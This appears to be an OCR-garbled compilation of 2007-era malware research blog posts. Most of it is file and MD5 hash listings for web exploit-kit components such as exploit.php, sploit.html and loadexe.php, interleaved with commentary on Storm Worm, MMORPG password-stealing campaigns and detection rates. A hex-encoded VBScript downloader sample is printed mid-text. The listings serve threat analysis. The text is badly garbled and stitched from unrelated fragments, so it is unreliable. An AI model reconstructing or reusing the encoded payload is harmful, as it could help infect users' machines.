ac04fb14afaae3bc4449a5401c3517e0 
ru.gif 
daa2a635125539998a491f04ce53dc60 
rw.gif 
87a0642d680c7ac4ae82a86c6850e80a 
sa.gif 
bbd932aea9265abf5815b74dd9446de4 
sb.gif 
c41690739c4f92af9e065e81690a2356 
sc.gif 
70b6c4f0F7bab3090a45cc9a8668e92F 
sd.gif 


aef2c6903b36e52b667bb0baa52604fc 
se.gif 


10205 


63ff75c06900689a5d43ab931bc82662 


sg.gif 
d89f586fb81c9a9cf9cdf95013F73908 
si.gif 
4f311a4b0a39db339be74a2f354d3799 
sk.gif 
01d603424483cf66ca867ba0flc9fec4 
S|.gif 
a8alca018798069590c0f8cb5796fc65 
sm.gif 
6330955519623fed6262d632956c66e0 
sn.gif 
14faa28a0e44dfc2727dfe228ee84a34 
so. gif 
5d8348e7a2fal302ff6a4a3fbd2bfea6 
sr.gif 
cb7f3cc497f4067d09a0d61070c937ff 
st.gif 
d0889a94d96bee4541ea661e7e3b6626 
Sv.gif 
1930fal4df40af4fd6ab9d60db7al3ed 
sy.gif 
73380e84dc753e6cfd5b3d19219024d3 
Sz.gif 
6ec7660bea2f18ffc26555f43d0f6ad8 
tc. gif 
5d456951dcf4eb341117c87857a20848 
td. gif 
c20e167cd531be6237422594b4072cd8 
tf.gif 
444a919ef49a1170cf6abf766f067054 
tg.gif 
6aa920611047a1bc48d722a896ae9466 
th. gif 


b525712cc1014c12071aa555b29d9654 
10206 


Thumbs.db 
73192a66bc2e7196ac196ef24c39fe75 


tj.gif 
acl1c06b195a17e9408472c15a5c086cd 
tm.gif 
42d945e3bce87e24a005ac96f7 79aeb7 
tn.gif 
f7d1ccddc14b1b2754f19c5eb2d51a56 
to.gif 
lee074e0dbbb595647270dbced8a8743 
tp.gif 
€668c8b8a6f7668410c90fffb7c4d8ab 
tr.gif 
23c0420906ac063753138c20bacd3ela 
tt.gif 
87decec956e1fc484b1a8b1716326b25 
tv. gif 
67e92c1c2cd1222fd607c9f91435883e 
tw.gif 
cf5c19a25cb1dd17f9d47b362d98e0a4 
tz.gif 
ef039d9935ecda27125f0fd39212ad44 
ua.gif 
1cc325bedc5df0920efedda54a184fdc 
ug.gif 
174636bd284c8d7f06638767bb84b6fd 
uk.gif 
39526cd54b55fba7910702d6a0061c90 
um.gif 
4546517ece394c3c8a22f8b7ed54ad81 
us. gif 
a5a63b0486b82f067e8cfcbf254a989b 
uy. gif 


275a0eccdca2720e84afa23054b5d371 
uz.gif 


10207 


9bb72b0eaaee6bab61de26f9b53624a86 


va.gif 
4fccba188125599f6448f8e0b71d0677 
vc.gif 
bc56207f7daf99ac171e85c3ca85e43b 
ve.gif 
f1082562cd7ee5776e6e732cc7220889 
vg.gif 
5f89b155213d1c29181d06da33a974f8 
vi.gif 
b30d88bf20ffc5c75a254ab25b4c562c 
vn.gif 
5bf8dfaf74506f3d89aa4ab6fd9c4e211 
vu.gif 
b1924aea4986245f3c6e770e8de1b843 
ws.gif 
a027ff7cdd02b873d271f8d5lab89ae8 
ye.gif 
ee7fb77f702f0182de807f188138a152 
yu. gif 
6a7e5foc9e3ac06b720eea3387477771 
za.gif 
37d219e52bce3b94891821896c71699a 
zm.gif 
al6bced0ab9ae9b874d4c0c35c36b918 
zr.gif 
c66f4e607dbc3158243360d69856f827 
zw. gif 


8d31cf8ee73d6c4e8fdd3c8382d01549 
Thumbs.db 
409b33e6713363836123fd833121c4f5 
vote _middle.gif 
31bbd8b3354f3370d3e4378393af1074 
iconbluarw.gif 
91add62ac978f82640bb2a7e6e51da7f 
10208 


iconbluarwdbl.gif 
389b0cf405761a535284603ee3858c84 
iconbluarwdblr.gif 
d4d3ea80294dfc7329b6b7da34dff66a 
iconbluarwr.gif 
91b03cb3e6781lafbfe50764cae84092a 
icongryarw.gif 
3f21b9f11137cc5f709005264f36685e 
icongryarwdbl.gif 
148397e0a2442d180e45cd6958b007e2 
icongryarwdblr.gif 
Obleeb34f57e0ab628fea56b07873536 
icongryarwr.gif 
Of1fd118e5a2d46aa076c9e5890abe72 
Thumbs.db 
f9f444f7c9elee793ef1400ae69f2aal 
inc.footer.php 
d580abb41lebab18c22afc15681a4669a 
inc.header.php 
3d472ceb5dd4dd7b064955dbfd32c20f 
inc.headerhtml.php 
ac474df5708a5cad281559a5227fa31f 
inc.headerphp.php 
f5749875d2cd80dfb749ecd24c2aad1c 
style.css 
859babad221958b7921e42c1280c5b46 
index.html 

lib.csource.php 
fa3de712c50483725bf3a052be/7bd5cf 
lib.functions.php 
lda3afe63039fc610249c4f15c32e410 
lib. placeholder.php 
55860e1f632eacleb5afa8800abc01d9 
cfg.php 
cb24d31b2cb7eb8cc063962defaffcc9 
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f.php 

e16c9a456flacbeb9d6220104a29fbf8 
ff-3.5.php 
211448de47e2ea18ffa9772afe9d8553 

file.exe 54dec204d0767321e845bb5d227562fa 
i.php 

66a454942d1247ab9b962435aaabe652 
index.php 
b43eb20997eb4e7ef16d8a90bf7c0058 

j.php 

3d04d21540alee82e6e132d1f0847525 
pdfl.php Oaee551e2642f28c251d90160d7ae594 
pdf2.php eacf7999dcal6ee594ffd8f870b71a02 
sajax.php 
d604410f241f4879c63d442e5bec6f60 
spl.image.php 
1840600d29b00b8435cd0ce24786840d 
sql.php 

bfd0cd1450eab99b85091b87758cfcbc 

test.jog c26a70a02442035a7836c1f6d0a50bf0 
admin.js.php 
496198bd6bfe7a3a50ec99110f54e8ec 
default.css.php 
e2a272edb796675a28b781fcca541fla 
flags.php 
084f5a93740425e27e9534583a3f2a7e 
geoip.dat 
fa685d37c5702689745d44f6bc89bd07 
geoip.php 
3f6f8a4ca28619d183bb9a4431e9e988 
index.php 
93853ded6eb38c888de7e8e81d4a8d98 

sj.php 

855d89f48b4eeb2553c33e9e9360f981 
_admin.js.php 
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6ed2a36240f85b59436e6bbaa9fb5f77 
home.php 6cafc3470c8fbc5c843dbd6b7df2657b 
bg.jpg 
2116fe0c8efacb551fc02f0842f662b8 
gradient-bg.gif 
e117fca9d088e4cd5bbbcec7b99a8408 
log _in.png 
7f0d58ce9917db21e7ce83c6851d7319 
panel-title-bg.gif 
b66384c309a397963389a76b07e9ecd4 
pig.png 
b766b95eb4346be6f018ce6f07327061 
home.php 99a814c519c3ce5151e641f3142b9ac7 
loadexe.php 

781lea68bebde87 6f13cf585a386a5db 
settings.php 
39bb94922362085995d6d6c021d5b4c7 
upip.php ee47d0d134231026c1c5223736c85f30 
de.php 
06029b4ac4ac995fb6c88f3a9200162F 
en.php 
3d3bfb77cc5145f4eb2dc305da5bfe05 
fr.ohp 
8986e93f1a30b1635cad4777b5f34670 
pl.php 
951999cbda9b7511e75ab7c46d82a3e7 
ru.php 
2eddb69bf7ea24123546bf01d9b62afd 
ua.php 
a8eb4f858649d55cd03757b0e8d7c931 
1l.php 
76e€a034652e5a37bf00898893d642331 
2.php 
de251a978acba0d202e5e7elfab4c90a 
ff-3.5.js.php 
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c4cce23e172c2b679db0a6d86562bb53 


index.php 
5911dbf4c42f196006a85f9e33dc3b45 
pdf1.js.php 
c49ee43c920f8229a480c5fald5aced1 
ak1.js.php 
14ebcc393af91c64cd4d5337a67ele3e 
ak1.jss.php 
84dfb0597299e3e61bc63ba4fd9b1a83 
ak1.php 
€5443029521b94cd74c5aee9ea3ech74 
ak2.js.php 
1d6ca47855be9c5e51b14ec93ecc2144 
ak2.php 
615b6d8623b923199beff59b61490203 
ak3.js.php 
0293b526e627be9dd5912c25d07bd45f 
ak3.php 
677bee6f563e532ee2c234c2eadf645e 
ak4.js.php 
ce18b524766632e761d047401a88d01e 
ak4.php 
b484889e90efb9068b86219ab85dc41la 
ak5.js.php 
7¢c16e66379b4a5d5b50268767d9d07c8 
ak5.php 
545029c9c963a547b8fe9f6b68342eed 
oak.js.php 
5c2ee996041394cc8297e7fe7d0eab4e 
oak.php 


f92f34cfa84e057be389b9f5519cdfd5 
2f08be47c541fa3f945d7338cd48cbf51.vbs 
bac6fafe82678c37463f3964b294bf5c 
2f08be47c541fa3f945d7338cd48cbf52.vbs 


2a846b246f2e118adc5085593068314c 
10212 


malware to not have to figure out how to bypass the authentication. As it looks like, [7]the 
current campaign has also hit Blogger and many other forums as well. 


http: //www.bleedingthreats .net/rules/bleeding-storm.rules 
http: //ddanchev. blogspot .com/2007/08/storm-worm-malware-back- in-game. htm 


http: //ddanchev. blogspot . com/2007/08/of fensive-storm-worm- obfuscation. htm] 
. http: //ddanchev. blogspot . com/2007/02/storm-worm-switching- propagation htm] 


worm-hits-blogger .htm 
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3.8.23 Massive Online Games Malware Attack (2007-08-30 13:55) 


<Secript Language="UBScript™> 

abe = 

" GBOG6F GO6E 062 60065 6072 067 2 006F 6672062 660726065 66730075 6060 6065 862 66 06E 0665 0678 60745660 066A 006460069 
9660 662 66675 6672 006C 662C 667 66061 60746868 8660 806A 0075 6672 B60 6630 6622 0068 66740674007 B603A O62F BO2F 6 
677 6077 6677 662E 6678 8676 6067 6061 BO6F 6668 6865 O62E 6663 BB6E 662F 6660 6073 662F BE6C 607400740673 862E 6865 06 
788665 6622 6660 666A 087 66861 66746068 63D 6622 6643 683A BOSC BOSC 6673 667 6 8668 BO6F 6673 007 4662E 6865 6678 686 
50622 8860 060A 8673 6865 067 4662 66061 066 4006F 6830 0628 806 4686F 66630075 6060 6865 BO6E 687 4062E 8063680720065 
666106746865 66045 0660 6065 6860 0665 BH6E 66748628 0622 BO6F 6662 806A 6865 0663 607 46622 86290629 6060 860A 80636 
63160280030 06226063 0660 0673 0069 6664003/A 6042 6044 6622 6060 006A 6063 6032 6030 0622 0639 6636 0643 0635 6035 06 
36 6620 0636 6035 6641 6033 6620 6631 6631 6622 6600 866A 6663 6633 6630 6622 66044 663 66020 6639 6638 6033 0641 6620663 
6663 06043 663 6603-40046 6622 6660 666A 6663 66346630 6622 0643 6632 6639 8645 6633 6636 8622 6880 B66 086 1 6064 006F 
G02E 06736865 667406041 687460746672 6069 6862 6675 607 46065 062 60622 6663 O66C 0861 6673 66736069 6064882260206 
6206063 6631 6626 6863 8632 0626 6863 6633 8626 6863 6634 8660 866A 6643 0641 BO4F 6669 8630 6622 6640 86698063 607206 
6F 0673 006F 6066 0674062E 6058 B64) BB4C 6048 66546054605 60622 8660 606A 6673 0065 6074662 60678 6860 6860 8030 006 
16064 606F 662E 6043 6072 0665 006100740065 BO4F 666206610065 6063 66740028 6043 6041 BO4F 6069 6620 662260220029 
866) 066A 6062 6631 663) 6622 6641 6622 6660 660A 6062 6032 6630 6622 606 4606F 0622 8660 686A 06620033 6030 662200646 
8626022 866) 866A 6062 66340630 6622 B62E 8622 8880 680A 8062 6635 6630 6622 6073 667 40622 6660 866A 6662 6636 6630 06 
22 06720065 6622 6660 666A 6862 6637 8630 6622 886 1 8660 6022 B66) 866A 6662 6638 6630 6662 6631 6626 6862 60326626 606 
28033 6026 006206346626 0662 0635 6626 8862 6036 6026 8862 8037 6060 660A 06736065 0674062 06061 9663 8630 6061 0864 
G06F 062E 6063 66720065 6861 60740065 BO6F 6862 006A 8065 0063 067 40028 6062 0638 0620 662206220629 6000 860A 00616 
631 6030 6622 0047 6622 B68) 066A 6061 6632 6630 6622 6045 0622 8060 606A 0661 6033 6630 6622 66540022 9600 006A 6078 06 
6D 0660 O62E BO4F 667 66065 GO6E 662 6606 1 6631 6626 606 1 6032 6626 606 1 6633 662 0675 6672 6860 8620 663 86800 860A 807 
86060 6660 062E 6053 6065 BOGE 68646060 866A 6061 6863 B62E 807 46679 667 66665 6630 0631 B66) 666A 8661 6063 O62E BB6F 
607 60065 B86E 6660 666A 6861 6663 B62E 6077 60720069 607 40065 062 60878 6660 BG6C B62E 66726665 6073 607 BOG6F BO6ES 
6736065 6642 B66F 66640679 B66D 666A 6661 6663 662E 6673 866 1 6076 6065 067 48G6F 6666 0669 6860 6665 662 6607 0606106 
748668 6020 6032 8660 866A 607 6 0661 067 2 662 06673 0068 8865 BE6C BB6C O30 006 1 806 4806F B62E 066360726065 0061687 
40065 G06F 0662 006A 0065 066306746028 06220653 6068 6065 8060 6060 O62E 0641 607 6067 B0G6C 6069 96630061 00746069 
GO6F BOGE 6622 G62 0622 6622 6629 BO6D 606A 6861 6663 BO2E 6063 B66C BO6F 6673 0065 BOED G8HA 0673 6068 6065 B66C 80606 
82E 6053 0668 0865 GB6C BO6C 062 0607 66861 6632 6632 6632 607 48068 6620 6622 6622 662C 0622 6622 662C 0622 OO6F 607 608 
65 BG6E 6622 662C 663666860 660A" 

cde = 

" BO6F GO6E 862 68065 607 2 067 2 O86F 6872962 968726865 8673 8075 6860 8865 862 86 06E 8665 8678 60740660 068A 6060 6631 
03D 0622 O06F 0062006A 8065 0063 06740022 8080 800A 0060 6032 8630 8022 0063 0860 006 1 6073 06730069 00640622000D0 


Despite [1]Storm Worm’s worldwide media coverage, there’re many other malware campaigns 
currently active in the wild, again exploiting outdated browser vulnerabilities such as this one 
aiming to steal passwords for [2]MMORPGs. The folks at the SANS ISC recently assessed [3]yet 
another malicious URL following a lead from the [4]recently breached site of Leuven, a city 
in Belgium. Apparently, the Chinese domain that’s naturally exploiting an already patched 
vulnerability has been [5]Jembedded within many other sites as well. MMORPGs password 
stealing malware is nothing new especially in Asia where online games dominate the vast 
majority of Internet activity for local netizens. [6]Creative typosquatting domain scams are 
still filling different domain niches left at the phisher’s disposal. 


VBS/Psyme.CB detection rate : 
Result: 10/32 (31.25 %) 


1024 


90e1d1a38a3ed5609a3ebcb9aa45af1l31.vbs 
bac6fafe82678c37463f3964b294bf5c 
90e1d1a38a3ed5609a3ebcb9aa45af132.vbs 
2a846b246f2e118adc5085593068314c 
9201652001f280daba8862a6c9e600601.vbs 
bac6fafe82678c37463f3964b294bf5c 
9201652001f280daba8862a6c9e600602.vbs 
2a846b246f2e118adc5085593068314c 
e55e407b4419bc6a93ee8aef6fidfa0b1.vbs 
0580b49a12f932c81ledaf85cda837f69 
e55e407b4419bc6a93ee8aef6fldfa0b2.vbs 
2a846b246f2e118adc5085593068314c 
kl361u65mpq33bk64no65utd601.vbs 
bac6fafe82678c37463f3964b294bf5c 
kl361u65mpq33bk64no65utd602.vbs 
2a846b246f2e118adc5085593068314c 
admin.php 
5ace62d93e11e59313048718ad6bea58 
config.php 
de95af2be6c272e583ca54bdb462709d 
domains.txt 
efb2c6ba6909398a4195a2cb296e3138 
ffcollab.php 
6a40bce3db1a4842e15falad8f3ab778 
functions.php 
fod134f0b696f0c55d73581b3f9a18d8 
geoip.dat 
c8c0766be81dfd409846a7ac3ficefcd 
geoip.php 
€97b3fab6391c783486e11d2a7846d76 
index.php 
2bc7eal566eb3eb3cd52d6e5b3554932 
install.php 
€13d7211c0d8420cb90fae75dbf2e512 
konec.php 
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87baab26010d5920733e409a1328478c 
loadjavad.php 
71d386be9f8288f76aeba712f8e26a74 
loadmdc.php 
94386fc537c9046f3c11be9100dc9b63 
loadpdf.php 
f790edf1b736d0d3dcb8b04c0c0e3304 
mdac.php 20fd5a0d5c953c7dba4f98351b7282e5 
pdfadmnplay.php 
078855e3eac8213a7220c83ee15f82bf 
pdfopera.php 
81e212779fc8276a89f29897eb92c3c9 

r.php 

d6eda292117279454dec92014e082451 
stat.php 15dacffae6918b6e49c21f5dfdalaa82 
rsa.php 
fd76b585462f92a9c1605b45a7160ef8 
bonerzero. pdf 
92101427d1681e8530c692de4d19bab5 
strungsuper.pdf 
482f395d7c94c2856a26ab235076b11f 

bg. gif 
1b38dbe2d932364e1a1e663d80159b63 
centr.png 
9eeb8edd9af29614208afffbf4ccO0a0c 

logo.png de0d37508a190fe281cc73b20249657b 
niz.png 
e3e4f9ale9b66c35cOd5a5elab6b6fa3d 
style.css 

Thumbs.db 
f1813bb248a3b0040b6751056105f491 
verh.png deb0O7c8fd838d48b18bceffa3b9e46f1 
dat.js 

ff2a2afld7bd7620e9ca0132bf927beb 
jquery-1.3.2.min.js 
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bb381e2d19d8eace86b34d20759491a5 
rsb.php 
7cba57a0a67ce4eda25ecef0470f0511 
admin.php 
e5b7acd2631663118091b76e70e0cf2d 
auth.php 56f6c06d393d19fcae2e7e6524d2255d 
blank.gif 
c26a70a02442035a7836c1f6d0a50bf0 
config.php 
8161c100bfc4a20cdd8al126ee2f3786c 
control _jscript.php 
41d015c90b1d268e7874ad8027b35a34 
crypt.php 
991635869cfabcd42dafae44002d28f1 
db _config.php 
383532fe1b38864296a8df9af1f42626 
dump.sql c34e236f23aaa3ff6fo594ee1818122f 
edit.png 9fc0a67d9b706fcefcdc5e371a32d743 
empty.png 
7£7593af1839855bf54flad0ef5fe997 
exe.php 
b22f1d806c03aa4582819686c1d129b1 
exit.png 32e87a47bfd8e38655c26ad545495a4d 
exp.php 
94576584e4ab671da607344c145e992F 
fade.js 
11d4e6d16f898faa9f32213c18290032 
func.php 43f0d65d8b34ecbc5cdf933fee330c5b 
functions.php 
76c2c46b05822dab705e766047f94c9F 
GeolP.dat 
f3f153e5ac6f252335383f1f82a67a71 
geoip.php 
10a02051a466315ea94fc41a97733621 
index.php 
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eb8ff3f956866c8bb6e4ef966f24fae37 
javascript.php 
6f9cad1331f003203d2eb9fbdb4cOclc 
loader.php 
1308d56e8ef90af537dff1517edd5c06 
login.htm! 
fo3df20e4e3f0cab7fb6535b23cebd87 
menu.jar aee8ael4cf44c38a5984364eb33179d9 
off.png 
2adb08c075celea5ae9eb085c122fd99 
on.png 
f302f47a9befala367e29dcb0d5bc226 
pdf.php 
267fcc2676d515d5a267b3aa6995ca42 
pic.png 
ced0f871dc1la1c355988a75b1115e56a 
PluginDetect.js 
3c8010388f9affb57963542d0c4d529c 
style.css 
aa9calcfobbb03873665225ddb9411957 
upload.php 
7db4a56e110ea0dad823ac73eel16ccaa 
file 

exe.php 
7e4eb4fcb10d28c348f8labbba2aa553 
i.php 
5790e7196ef167da3dcd6364d42215c5 
robots.txt 
9152d7f1724ed8fbcd2e0c87029f193c 
stat.php 5569e0ec4fc15876099349619e092356 
com.php 
9be3f1930458d308815b0114e318f17e 
iep.php 
d7b532673fa0842ebfdb2168be9ceaf4 
java.php 4d14704f91fea9359d6f6568cb9e7c07 
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mc.php 

b024a6a238427300fb53a6fafa707d4d 
mdac.php a671ca64e5750416e73506ad6acb6ae7 
pdf.php 

f94c796d6c346d41d5ae517a8ae76ead 
snapshot.php 
1336f09ae3abedf43de0bfca29ae4c43 

404.php 

9770aca74f3d53d253f142b20c475b2f 
crypt.php 
264082c67f58f962f8a988cbd81c3e7e 

db.php 

4093ebfbf306dc55a05989b2c5e5408a 
fake.php b443e78aca397a9031cb4d432df901c3 
func.php 0965ee5502aelfd7aaf70805fdac7313 
geoip.dat 
c626609d7b17845dcfce715840e0e115 
geoip.php 
fab013b9795ffcO2acc5ce0fcO8bb2d3 
index.php 
f54b2d8ea72d50e4c8357495be765e49 
auth.gif 19d8e7b551fb973e9dc379ede4b1104c 
br.gif 

710e5f96e6ab5f5babdfecb1b35c08d3 
country. gif 
51fe512dc3297dfa9cf8ef88d79ca59b 

CSS.CSS 

574470a35f4ca8ed8401lecee5bd5632d 
mysaql.gif 
a615f16663b4459a0b575130d0cbccé6b 
nav.png 

2e0151c0f63a0a20f1lb7ee06a36c05ac 
other.gif 
1f75a37dd2d198aa52934b78c49d9d82 

stats. gif 
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7bb3e5f2240a95d245ae7f31dc57789a 
Thumbs.db 
215d3af800f56e31a568cd7e9cd679a7 
!readme.txt 
9a099038a996e1b15e9c13416d977080 
check.php 
1bd1d3a5cd5096d96c6f616146556143 
clear.php 
c1f5b084423044987174229f346de854 
configure.php 
aebce20dd9fe5c857c24b4c74bb71bfe 
eiframe.php 
dc76766e6057161c4a15edbb2c480485 
exploit.php 
96000b683f280296e9e184e841521fb2 
exploits.php 
840d51fe23cd71ec54102c66a5d881cd 
geterror.php 
cd0bd37455c2a4484f24dc99e9fd9cca 
iframe.php 
ad13cd371f6e670e4a6742de4f7b309d 
ignore.php 
a9969balab6b9252caf28d8749f338b2 
index.exe 
aef304cc6bb1245d6d607fe25d38cdda 
index.php 
fd0de02d01962d58d173ed3c83e33f0c 
js.php 
2f50f98cccOaf2cded6e70e40a47f7b1 
languages.php 
823e8598b087cda2f2d279096596f7be 
referers.php 
€d378156f6f32237f505cbff1311b767 
upload.php 
€382408beb8c135be8a2448c98a3728d 
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screen.css 
c2afedf5755321181bf7fclaceac5e59 
«htaccess 
d522e5fa9f320e8608f2d4dcd45ad219 
sploit.html 

986347a875e9f8ed5 7dbfa7876d12a90 
-.gif 
552b02f3ee27badc9436c5b7d2170f3e 
ad.gif 
6d1aa633a8097b961bda2f5f735f35a7 
ae.gif 
f212f62ad8f9209e58345eaffae81115 
af.gif 
7110571f5f22f1942ee97afa41f51e61 
ag.gif 
49068e672834658b179cd86a35325e47 
ai.gif 
5ff25d17bfde13c3a09961d87b04clba 
al.gif 
02c223e7f2c1d4f98553d6167b723cb2 
am.gif 
33b02876d7e0dadfa94db32443dda36e 
an.gif 
caf5f4429cf5a5d91a457385460d9c38 
ao.gif 
c5088908713d6679c0c36d225769c732 
ar.gif 
9c95874961754b638a20b39ce7696Ff31 
as. gif 
b58f58ac2f16e7d81f1480875a8e33c0 
at.gif 
eeb91d7617243cadbe646b6d795c678f 
au.gif 
1fe85ab1104e05f5a26efa5bbcd1cf18 


aw.gif 
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65ed67b97141c58ea652416ab83f2676 


ax. gif 
6calb9ad68066fa5dd253e05acf85496 
az. gif 
b1646ac4434f234d8d5034606a7af947 
ba.gif 
53dfab82eedc9f915dd7413blacdd8cb 
bb. gif 
a4e2a530aaaa28ecfe7a63f3b6081871 
bd.gif 
12e3055f52cf6a1551d4146b2ef8bf34 
be.gif 
595a78d8e7caadfee854dd2f15e22093 
bf. gif 
207fcec4143ee2d33d81bf24fd2e93fb 
bg. gif 
5be202b067ced9053affd880754fcf63 
bh. gif 
5411780a3d43531laae0b66eec250467c 
bi.gif 
2c7cf6b75c5fe88be53237ce6b9ba709 
bj.gif 
da5abd9ecc82282cd8dfa8507d72b19d 
bm.gif 
foa77982d567bc1892c2b64d6ef47a81 
bn.gif 
87b3432e4df98e0b73673ac910f01010 
bo.gif 
Ob8ef2f7302d078461e47676119c08ab 
br.gif 
92858b17e2d5b63d040104586ff52302 
bs. gif 
72ba741ab39307b5639ef2ba4bd96fe7 
bt.gif 


36d740145ed89f4a02fc483baed1323a 
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bv. gif 
bbc9011e876a122¢ea89923e6b730ec50 
bw.gif 
d841ce1d195d470bdddb1c478039c050 
by. gif 
f90504a0c446c69ebf3031a0cb6f7ea81 
bz.gif 
035793a3b9079e171leesf5f81bda9cc7 
ca.gif 
71ad31lefd4e749a2e23b706c15db73ae 
cc. gif 
94a9202e2d3618f0d788e5f2d54323c6 
cd.gif 
abea6é2ffce5cf4cb744a2d6355f4c21a 
cf.gif 
€885f0438ba36f1f4787bb603f99c8Ff3 
cg.gif 
6ff3d64b899ee3c52af74134dd405424 
ch.gif 
ed43f66bc567ac6954adf9e949aede86 
ci.gif 
8ed1d6c276ae7964928ae032c2b9acal 
ck. gif 
af275b38413317a7b23bdf799dd567c7 
cl.gif 
78d55180619241a9df9cccf6e3d9f6f3 
cm.gif 
8ald0e21ed2ec1be609574a473493031 
cn.gif 
b04190e287f32d56867cd6ac53fdedcb 
co.gif 
405dfe11225ebelcc34b30ccd765753e 
cr.gif 
bd762e1a0567e38bcaeale9b3956b6c1 
cs.gif 
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be7111c8a514d660850c92d217b7860e 
cu.gif 
03d19d686d0e21a037cbcbca332ececO 
cv.gif 
a6bfe2d82321df4314f181154080b78c 
cx.gif 
ac0Ob5e80669c0e7f7fcf6d577d7d5df4 
cy.gif 
649f116f7c7c2f0524d6428eaal 7ad6c 
cz. gif 
6352cbfac37d53fd10f6948e8b9a4ac8 
de.gif 
bOdbdccflc4e4a267a5cd2bf7ea4cb69 
dj.gif 
30bd321e11df6356b73eaa21fb183eae 
dk.gif 
d7c2fddc4b0a9c6ca3d5e2ed13374421 
dm.gif 
efcf65d93c1713cc052dec2e0883b877 
do.gif 
9389aa6eb9859b2a7b00843482847356 
dz.gif 
e8da7d880886bf815ad641b7cd0b7f9c 
ec.gif 
4b82d78f2a20846b268f28caac6a4ab4 
ee. gif 
7¢9d14f7681e967ea10d4fa2a8f0ecde 
eg. gif 
99dd064303f1d69989789038e8d60020 
eh. gif 
043ce3f2f09f6ee41984a83757365ela 
england.gif 
331d7734597flb86e1dba8b569707be8 
er.gif 
509ed59423d395c2c73f2e4f815dbaeb 
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File size: 9857 bytes 
MD5: 2a5eff5381cec4a7d5478b989aeb2ada 
SHAI1: e08cdb74965c31b70ab24d82761b652035283a87 


Trojan-PSW.Win32.WOW.sp detection rate : 

Result: 19/32 (59.38 %) 

File size: 52170 bytes 

MD5: f37a18d2e991ef5cd7ea7a4dfcb6e3f5 

SHA1: clcbee89bal1033b8e739067eab086f70b476c5aa 


What’s also worth mentioning is that [7]the campaign has a built-in [8]freely available 
counter compared to the typical campaigns who tend to use [9]malware kits for C &C and 
[10]detailed statistics of the [11]infected population. 


1. http://ddanchev. blogspot .com/2007/08/storm-worms-use-of-dropped-domains. htm 
. http: //en.wikipedia. org/wiki/MMORP 
. http://isc.sans.org/diary .html?storyid=3324krss 


ttp://security4all. blogspot .com/2007/08/website-belgian-city-leuven-defaced-and.htm 


. http: //www.google.com/search?q=xvgaoke.cn/ms/1tts.js 


2 
3 
4 
5 
6. http: //ddanchev. blogspot . com/2007/07/world-of-warcraft-domain-scam. html 
7 
8 
9 


ttp://www.s108.cnzz.com/stat . php?id=413942kweb_id=413942 


. hbttp://www.cnzz.com/stat/login. php?web_id=413942 
. http: //ddanchev.blogspot .com/2007/08/nuclear-malware-kit. html 


file extraction data ? 


ntipv/192.168.0 ] calc.exe 80 tested systemn32 ~| same as source hidder ¥]| iexplore 


custom icon ? 
upx compression (9) ? —— 
mett 2 ——————————————————————— 


Popular malware tools such as binders and downloaders usually come in a typical software 
application form. Moreover, when | talk about [1]malware services | mean [2]crypting, 
[3]packing and [4]limiting the [5]detection rate on demand, while in this case we have a DIY 
malware as a web service, a trend to come or a fad to dissapear, only time will show but the 
possibilities for porting popular malware tools in a web service form are quite disturbing. 
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es.gif 
cOddb5b02a4d2c4d274140a6cffc4be0 
et.gif 
b738a5aca0b4b4c05a6c745380fcf222 
fam.gif 
190106f196e51bf0c41a6961c189610b 
fi.gif 
94e7d08c3043f3dc65b4eff40223d4e8 
fj.gif 
3a839ddc795a643dad5c6cfa83f9721f 
fk.gif 
21884f77423cbf8eb4b86f61399345b0 
fm.gif 
013d4b6246bd2158f9d9bc685be72840 
fo.gif 
f2946a58a93f63303c47d649617e03be 
fr.gif 
0a4673b07b377d1f58230f40f256d890 
ga.gif 
6023ba4847dd1329d210f687c63458d5 
gb.gif 
5f1b63912b5b84a73895a8ad21004209 
gd.gif 
282a476bceb7bdbfc19a47d68a0efc18 
ge.gif 
a04177e4b34a23dcbf0e8a64838b4619 
gh.gif 
e72c4c18615e958e05dcc12364fe6527 
gi.gif 
2ca6d3fcbabb4b5dc430c8a552d7fbl1lb 
gl.gif 
edcdeb38a22b784f2c19f76f2af37d39 
gm.gif 
bcfe045327c84129e7d8118d9a7a5524 
gn.gif 
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918580fdb7cd4df14d4805b9ac95f82c 
gp.gif 
15cfled243475f743fbd95813985724b 
gq.gif 
d7bef30dfa3e2ee2b6blea84eab0d047 
gr.gif 
d26600ec24ea1cd62a3042d1d68f2ac4 
gs.gif 
e3cOab08adb27ea01a370f63926f232e 
gt.gif 
65511daa32c81a3eb2fb925e15101687 
gu. gif 
Obde69cee1c5862dcb000c6848d84273 
gw. gif 
162a7157154d909cd81bdc6632ecbc63 
gy.gif 
71a4f19942ccd37df09fa813943e5fee 
hk.gif 
692eea40bfOb08bac50f9785a843cb5f 
hn.gif 
cOe00f96daf73bd2bea3ad87c63aede2 
hr.gif 
825a4f07cfe3bf652ele9ec72ee26f14 
ht. gif 
92a6d557dladf362160e3bd0d774ecb7 
hu. gif 
d543f5932e461ef6b04c070a63ccd151 
id.gif 
6f27ba21a22aa1486b568aa200d6c73c 
ie.gif 
74924874aa60e9fda9d94dcb892e322a 
il.gif 
44d2cc7e87c0f39eda33a43234d75afd 
in.gif 
46e1776549c9bb866ae7b18f9d847b0a 
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io.gif 
f6c43cf9bc8365d50b65019f9Ffc543d7 
iq.gif 
a4bd28a6c543211dacb5ce3e18e96846 
ir.gif 
6456dc4dd3745e2c84c13702eeb87844 
is.gif 
347f6ff824ac5e7a31fc549811c9aac7 
it. gif 
7b2fba7a5df93ea5980e1d46409642b2 
jm.gif 
98ea05ee62c0d4462f902b108b046439 
jo.gif 
ac7a3elaace29eb636ed41332b4c68ae 
jp.gif 
b6fa87814a6e40fcdf41d79c5e06c406 
ke.gif 
6592c34b8a16505388c21e99508e580b 
kg.gif 
385d842f1918453025966751d5b55 1bf 
kh. gif 
2a0042042f0d6feea0c435f9833b1bd4 
ki.gif 
b01814ad07dee8bc4be5d3038cc8b6b5 
km.gif 
258ef6e0c4f69ba726277a93a51dac56 
kn.gif 
f23fe3a61lad0d78bb69c25711leeb249f 
kp.gif 
f45a650bf92b6ad6552bf618d2ffe75d 
kr.gif 
53ca55d29130501b6cd57b98f169701f 
kw. gif 
48d87006385685ae24764c0d9b595d9b 
ky. gif 
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4d159d20cf64b712700756d32cde64ee 
kz.gif 
9faa30e94f43918d74d09b3eaaec6933 
la.gif 
334d5527bcd7e6901a6b729e632683df 
lb.gif 
2¢3675c6a47325a4d2445e50afc929ae 
Ic.gif 
7a5699234ec597d0bc927e6dbfae579a 
li.gif 
239e66bf39e8052587b504515a21f03b 
Ik. gif 
8f906d20bf8ab9749e19958ad60e1584 
Ir.gif 
21cd61ee215e4b0147ab4320822cf2fc 
Is.gif 
